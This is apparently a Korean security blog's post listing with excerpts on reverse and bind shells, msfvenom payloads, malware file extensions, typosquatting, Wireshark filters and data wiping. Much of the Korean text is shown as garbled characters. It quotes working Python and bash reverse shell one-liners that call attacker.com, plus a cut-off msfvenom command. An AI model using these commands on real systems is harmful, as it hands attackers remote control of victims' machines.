728x90 ๋ฐ์ํ ๐์ ๋ณด๋ณด์108 ์์คํ ๋ณด์ - ํ์ด์ฌ ๋ฆฌ๋ฒ์ค ์ ์คํฌ๋ฆฝํธ export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' ๋๋ถ๋ถ์ ์ ๋์ค ๊ณ์ด์ OS(๋ฆฌ๋ ์ค, ๋งฅos)์๋ python2๋ ์ค์น๊ฐ ๋์ด์๋ ๊ฒฝ์ฐ๊ฐ ๋ง์ผ๋ ๋ณ๋์ ์ค์น ์์ด ๋ช ๋ น์ด๋ง์ผ๋ก ์ฌ์ฉ ๊ฐ๋ฅํ๋ค. ์ถ์ฒ: https://gtfobins.github.io/gtfobins/python/#reverse-shell python | GTFOBins Run socat file:`tt.. 2023. 1. 25. ์์คํ ๋ณด์ - ๋ฉํ์คํ๋ก์ msfvenom ๋ฆฌ๋ฒ์ค ์ ์ ์ ๋ช ๋ น์ด ์ถ์ฒ: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n… infinitelogins.com ์๋์ฐ msfvenom -p windows/meterp.. 2023. 1. 24. ๋ณด์ - GTFOBins, ์์คํ ๋ณด์ ๋ฌด๋ ฅํ ๋ช ๋ น์ด ๋ชจ์๋ค https://gtfobins.github.io/ GTFOBins pg Shell File read SUID Sudo gtfobins.github.io ์์) Bash ๋ฆฌ๋ฒ์ค ์ ํ์ฑํ ๋ช ๋ น์ด export RHOST=attacker.com export RPORT=12345 bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT 2023. 1. 22. ์น ๋ณด์ - ๋ฐ์ธ๋ ์, ๋ฆฌ๋ฒ์ค ์, ๋๋ธ ๋ฆฌ๋ฒ์ค ์ ๋ฐ์ธ๋ ์ ธ์ ํ๊น ๋๋ฐ์ด์ค์ ์ค์น๋ ์ ธ์ ์ผ์ข ์ด๋ค. ๊ณต๊ฒฉ ๋์์ด ๋๋ ํธ์คํธ์ ํน์ ํฌํธ์ ๋ฐ์ธ๋ฉ๋ผ ๋๋ฐ์ด์ค์ ๋ํด ์์ ๋๊ธฐํ๋ฉฐ, ํด์ปค๋ ์๊ฒฉ์ผ๋ก ์ด ์น์ ธ์ ์ก์ธ์คํด ๋์ ํธ์คํธ์์ ์คํฌ๋ฆฝํธ๋ฅผ ์คํํ๋ ๋ฐ ์ฌ์ฉํ ์ ์๋ค. ๋ฆฌ๋ฒ์ค ์ ธ์ ๊ณต๊ฒฉ์๊ฐ ๋ณด์ ์ทจ์ฝ์ ์ ์ด์ฉํด ํธ์คํธ ์ปดํจํฐ์ ์๊ฒฉ์ผ๋ก ์ฐ๊ฒฐํ ์ ์๋๋ก ํ ํ, ๊ณต๊ฒฉ์๊ฐ ์์ฐ์ ํฌํธ๋ฅผ ์ด๋ฉด ํธ์คํธ ์ปดํจํฐ๊ฐ ๊ณต๊ฒฉ์์ ํฌํธ์ ์ ์ํ๋ ๋ฐฉ์์ด๋ค. ๊ทธ ์ดํ ๊ณต๊ฒฉ์๋ ํผํด์์ ์ปดํจํฐ๋ฅผ ๋ง์๋๋ก ์กฐ์ข ํ ์ ์๋ค. ๋๋ธ ๋ฆฌ๋ฒ์ค ์ ธ์ ๊ณต๊ฒฉ ๋์์ด ๋๋ ํธ์คํธ๊ฐ ํด์ปค๋ก๋ถํฐ ๊ณต๊ฒฉ์ ๋ฐ๋ ํฌํธ๊ฐ ์๋ ๋ณ๋์ ํฌํธ๋ก ํด์ปค์ ์ฅ์น์ ์ฐ๊ฒฐ๋๋ ๊ฒ์ด๋ค. ๋ฐ๋ผ์ ์ ๋ ฅ ํธ๋ํฝ ํฌํธ์ ์ถ๋ ฅ ํธ๋ํฝ ํฌํธ ๋ฑ ์๋ก ๋ค๋ฅธ ๋ ๊ฐ์ ์ฐ๊ฒฐํฌํธ๊ฐ ์๋ค. ์น์ ธ์ ์๋ฒ์ ์ฌ๋ฆฌ๋ ๋ฐฉ๋ฒ์ ํ์ผ ์ .. 2022. 12. 5. ๋ณด์ - ์นจํด์ฌ๊ณ ๋์๋ฒ ๋์ "์๋ฝ์๋ฝ ๋ณด์ 119" ๋ฆฌ๋ทฐ ์๋ฝ์๋ฝ ๋ณด์ 119 ์๋ฝ์๋ฝ ๋ณด์ 119, ์ ์ฑ ์ฝ๋, ํดํน, ํผ์ฑ, ๋์ฌ์จ์ด, ๋๋์ค๋ฅผ ๋๋นํ๋ ์ฐ๋ฆฌ์ ์์ธ๋ฅผ ์์๋ณด๋ ์ฑ ์ ์ฝ์ด ๋ณด์๋ค. ์ต๊ทผ์ ๋๋์ฑ ๋ณด์์ ๊ด์ฌ์ ๊ฐ์ง๊ฒ ๋๋ฉด์ ์ฌ์ด๋ฒ ๋ณด์ ๊ด๋ จ ์๋ฃ๋ค์ ์ธํฐ๋ท์์ ์ฐพ์์์ง๋ง ๋ถ์กฑํ ์ ์ด ๋ง๋ค๊ณ ๋๊ปด ์ ์ ๋ณด์ ๊ด๋ จ ์ ๋ฌธ๊ฐ๊ฐ ์งํํ ์ด ์ฑ ์ ์ ํํ๊ฒ ๋์๋ค. ์ฑ ์ ์์ ์ ๊ทธ๋ฆผ ์๋ฃ๊ฐ ์์ด์ ๋ ์ดํดํ๊ธฐ๊ฐ ์ฝ๊ณ , ๋ฌด์๋ณด๋ค๋ ๋์ฑ ๋ง์์ ๋ค์๋ ์ ์ ๋์ ๋ฐฉ๋ฒ์ด ์ ํ ์๋ ๊ฒ! ๋ง์ฐฌ๊ฐ์ง๋ก ์ฌ์ง์ผ๋ก ์ค๋ช ๋์ด ์์ด์ ๊ทธ๋๋ก ๋ฐ๋ผ ํ๊ธฐ๋ง ํ๋ฉด ์์ฌ์ด ์ฌ๊ณ ๋์์ด ๊ฐ๋ฅํ๋ค. ์ฑ ์ ์ด๋ฆ์ด "์๋ฝ์๋ฝ ๋ณด์ 119"์ธ ์ด์ ๊ฐ 119๊ฐ์ง ๋ณด์ ์ํ ์ฌ๋ก๋ฅผ ๋ค๋ฃจ๊ธฐ ๋๋ฌธ์ ๋ถ์ฌ์ง ์ด๋ฆ์ด๋ฉฐ, ๋ชฉ์ฐจ๋ฅผ ๋ณด๋ฉด ์๊ฒ ์ง๋ง ์ ~~~~๋ง ๋ค์ํ ์ํ ์ฌ๋ก๋ค์ ๋ค๋ฃฌ๋ค. ์ฐ๋ฆฌ์๊ฒ ์ต์.. 2022. 10. 9. ์์คํ ๋ณด์ - EXE ํ์ฅ์๋ฅผ ๋์ฒดํ๋ ํ์ฅ์๋ค(SCR, COM, BAT) .exe ํํ์ ์คํ ํ๋ก๊ทธ๋จ ๋ง๊ณ ๋ .scr๊ณผ .com์ผ๋ก๋ ๋์ผํ ์คํ ๊ฒฐ๊ณผ๋ฅผ ๊ฐ์ ธ์ฌ ์ ์๋ค. .scr .scr์ ํ๋ฉด ๋ณดํธ๊ธฐ ์ฆ Windows Screensaver๋ฅผ ์๋ฏธํ์ง๋ง ๋ง์ฐฌ๊ฐ์ง๋ก ํฌ๋งท ์ข ๋ฅ๊ฐ ์คํ ํ์ผ ํํ๋ผ์ .exe ํ์ผ์ ํ์ฅ์๋ฅผ .scr๋ก ๋ฐ๊ฟ๋ง ์ค๋ ๋๊ฐ์ด ์คํ์ด ์ ๋๋ค. ์ด๋ฅผ ์ ์ฉํ์ฌ ๋ฐฑ์ ํ๋ก๊ทธ๋จ์ด .exe๋ฅผ ์ฐ์ ์ ์ผ๋ก ๊ฒ์ฌํ๋ค๋ ๊ฒ์ ์ฐํํ๊ธฐ ์ํด์ .scr์ ๋์ ์ฌ์ฉํ๋ ๋ฉ์จ์ด๋ ์กด์ฌํ๋ค. .com .com์ DOS Command File์ผ๋ก .scr๊ณผ ๋ง์ฐฌ๊ฐ์ง๋ก ์คํ ํ์ผ ํฌ๋งท์ ๊ฐ์ง๊ณ ์์ด์ .exe ํ์ผ์ .com์ผ๋ก ๋ฐ๊ฟ์ค๋ ๋์ผํ๊ฒ ์คํ๋๋ค. ์๋๋ DOS ํ๊ฒฝ์์ ์์ฃผ ์ฌ์ฉ๋๋ ํ์ฅ์์ด์๋ค๊ณ ํ๋ค. ์ฐ๋ฆฌ๊ฐ ์์ฃผ ์ฌ์ฉํ๋ ์ธํฐ๋ท ๋๋ฉ์ธ ".com"๊ณผ๋ ๋ค๋ฅธ ๊ฒ.. 2022. 10. 7. ์์คํ ๋ณด์ - Jscript Jscript๋ ECMA์คํฌ๋ฆฝํธ ํ์ค์ ๊ธฐ๋ฐ์ ๋ ์คํฌ๋ฆฝํ ์ธ์ด์ด๊ธฐ ๋๋ฌธ์ Javascript๊ณผ ๋ฌธ๋ฒ์ด ๋๊ฐ๋ค. ๊ฒ๋ค๊ฐ ๋ ๋ค ๋ธ๋ผ์ฐ์ ์์ ์คํ์ํค๋ ์คํฌ๋ฆฝํธ ์ธ์ด์ธ ๊ฒ๋ ๋์ผํ๋ค. (Jscript: ๋ง์ดํฌ๋ก์ํํธ ๊ฐ๋ฐ, Javascript: ๋ท์ค์ผ์ดํ ๊ฐ๋ฐ) ํ์ง๋ง ๋์ด ๊ฐ๋ค๊ณ ํ ์๋ ์๋ ๊ฒ Jscript๋ ์์คํ ๋ด์ ์ธ๋ถ ํ๋ก๊ทธ๋จ์ ์คํ์ํฌ ์ ์๋ WScript(์๋์ฐ ์คํฌ๋ฆฝํธ ํธ์คํธ)๋ฅผ ์ถ๊ฐํ ์ธ์ด๋ผ๋ ์ . ์์๋ก Jscript๋ ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ์์ ์ฐ์ด๋๋ฐ(์ง๊ธ์ ์ฌ์ฉ ์ค๋จํ์ง๋ง) ์ฐ๋ฆฌ๊ฐ ์ํ ์ฌ์ดํธ์ ๋ค์ด๊ฐ๊ฒ ๋๋ฉด ์ปดํจํฐ์ ๊น๋ ค์๋ ๋ณด์ ํ๋ก๊ทธ๋จ๊ณผ ์ํธ์์ฉ์ ํ๊ฒ ๋๋๋ฐ ์ด๊ฒ WScript ๋๋ถ์ ๊ฐ๋ฅํ ์ผ์ด๋ค. ๊ฐ๋ ์๋์ฐ์์ .js ํ์ผ์ ํ์ธํ๋ฉด ์๋์ฒ๋ผ ๋ญ๊ฐ ์์ด์ฝ๋ ์๊ณ ํ๋ฐ .. 2022. 10. 6. ์น ๋ณด์ - IP ๊ธฐ๋ฐ ๊ฒ์ฆ ๋๊ตฌ(criminalip) https://criminalip.com ์ฃผ์๋ ์์ดํผ๋ฅผ ์ ๋ ฅํ๋ฉด ์ํ๋๋ฅผ ๋ถ์ํ์ฌ ์๋ ค์ฃผ๋ ์ฌ์ดํธ๋ค. 2022. 10. 6. ์น ๋ณด์ - ํ์ดํฌ์ค์ฟผํ (Typosquatting) ์ฌ์ฉ์๊ฐ ๋๋ฉ์ธ ์ฃผ์๋ฅผ ์ค์๋ก ์๋ชป ์ ๋ ฅ์ ํ๋ ๊ฒ์ ์ ์ฉํ์ฌ ์๋ชป ์ ๋ ฅ๋ ์ฃผ์์ ์ฌ์ดํธ์ ๋ฐ์ด๋ฌ์ค๋ฅผ ์ฌ์ด ๋ค์ด๋ก๋๋ฅผ ์ ๋ํ๋ ๊ณต๊ฒฉ ๋ฐฉ์์ด๋ค. ๋ํ์ ์ผ๋ก google.com์ ์ค์๋ก ์๋ชป ์ ๋ ฅํ goggle.com, gooogle.com ๋ฑ ์ด ์๋ค. ๋งค๊ทธ๋๋ฒ ๋ฅด(Magniber)๋ผ๋ ๋์ฌ์จ์ด ๋ํ ํ์ดํฌ์ค์ฟผํ ์ ์ด์ฉํ์ฌ ๋ค์ด๋ก๋๋ฅผ ์ ๋ํ๋ ๋ฐฉ์์ ์ฌ์ฉํ๋ค. https://asec.ahnlab.com/ko/39376/ ๋งค๊ทธ๋๋ฒ ๋ฅด(Magniber) ๋์ฌ์จ์ด ๋ณ๊ฒฝ (*.js -> *.wsf) - 09/28 - ASEC BLOG ASEC ๋ถ์ํ์ ์ง๋ 9์ 8์ผ ๋งค๊ทธ๋๋ฒ ๋ฅด ๋์ฌ์จ์ด๊ฐ CPL ํ์ฅ์ ์์ JSE ํ์ฅ์๋ก ๋ณ๊ฒฝ๋จ์ ๋ธ๋ก๊ทธ๋ฅผ ํตํด ์๊ฐํ ๋ฐ ์๋ค. ๊ณต๊ฒฉ์๋ 9์ 8์ผ ์ดํ์๋ ์ง๋ 9์ 16์ผ์๋ J.. 2022. 10. 6. ๋ณด์ - ๋ฌด๋ฃ ์คํ์์ค ๊ธฐ๋ฐ ์ํํธ์จ์ด(FOSS) ์ถ์ฒ ์ฌ์ดํธ ๋ชจ์ https://www.privacyguides.org/ Home Privacy Guides is your central privacy and security resource to protect yourself online. www.privacyguides.org https://www.privacytools.io/ Best Privacy Tools in 2022: Software Alternatives Usability: Is the app or service user-friendly and easy to use? A modern and well-designed interface makes it easy to understand for users and therefore can be widely adopt.. 2022. 9. 29. ๋คํธ์ํฌ ๋ณด์ - ์์ด์ด์คํฌ(Wireshark) SSL handshake ํํฐ Useful Wireshark filter for analysis of SSL Traffic. Client Hello: ssl.handshake.type == 1 Server Hello: ssl.handshake.type == 2 NewSessionTicket: ssl.handshake.type == 4 Certificate: ssl.handshake.type == 11 CertificateRequest ssl.handshake.type == 13 ServerHelloDone: ssl.handshake.type == 14 Note: “ServerHellpDone” means full-handshake TLS session. Cipher Suites: ssl.handshake.ciphersuite I fo.. 2022. 9. 22. ๋์งํธ ํฌ๋ ์ - ํด๋ํฐ, ์ปดํจํฐ ์ ์ฅ ์ฅ์น๋ฅผ ๋ณต๊ตฌ ๋ถ๊ฐ๋ฅํ๊ฒ ๋ง๋๋ ๋ฐฉ๋ฒ ํด๋ํฐ 1. ๊ณต์ฅ ์ด๊ธฐํ 2. ์์ด ๋์๋ฌธ์ + ์ซ์ + ํน์๋ฌธ์ ๋น๋ฐ๋ฒํธ ์ํธํ 12์๋ฆฌ ์ด์ 3. ํด๋ํฐ ์ฌ๋ถํ ํน์ ์ข ๋ฃ - ํด๋ํฐ์ ์ฝ์ ํ๋ SD ์นด๋๋ ๋ฐ์ ๋ฐฉ๋ฒ์ ๋ฐ๋ฅธ๋ค. ์ปดํจํฐ(HDD, SDD, SD ์นด๋) 0. BitLocker ์ํธํ 1. ์๋์ฐ ์์ฒด ๊ธฐ๋ฅ์ธ "๋น ๋ฅธ ํฌ๋งท" ์ฌ์ฉ 2. ๋ก์ฐ ํฌ๋งท 3๋ฒ ์ด์(ํน์ cipher ๋ช ๋ น์ด ์ฌ์ฉ "cipher /w:๋๋ผ์ด๋ธ๋ช :" ) 3. ๊ฐ์์์ผ๋ก ํ๋๋์คํฌ์ ์์ฑ์ ๋ง๊ฐํธ๋ฆฐ๋ค. 4. ๋๋ฆด๋ก ๋์คํฌ๋ฅผ ๋ฌผ๋ฆฌ์ ์ผ๋ก ํ๊ดด ์ฐธ๊ณ : https://syki66.github.io/blog/2020/08/10/make-disk-irrecoverable.html ์ ์ฅ์ฅ์น์์ ํฌ๋ ์์ผ๋ก๋ ๋ณต๊ตฌ ๋ถ๊ฐ๋ฅํ๊ฒ ํ์ผ ๋ฐ ํด๋ ์์ ์ญ์ ํ๊ธฐ - syki66 blog ์ผ๋ฐ์ ์ธ .. 2022. 9. 16. ์ด์ 1 2 3 4 5 6 7 8 9 ๋ค์ 728x90 ๋ฐ์ํ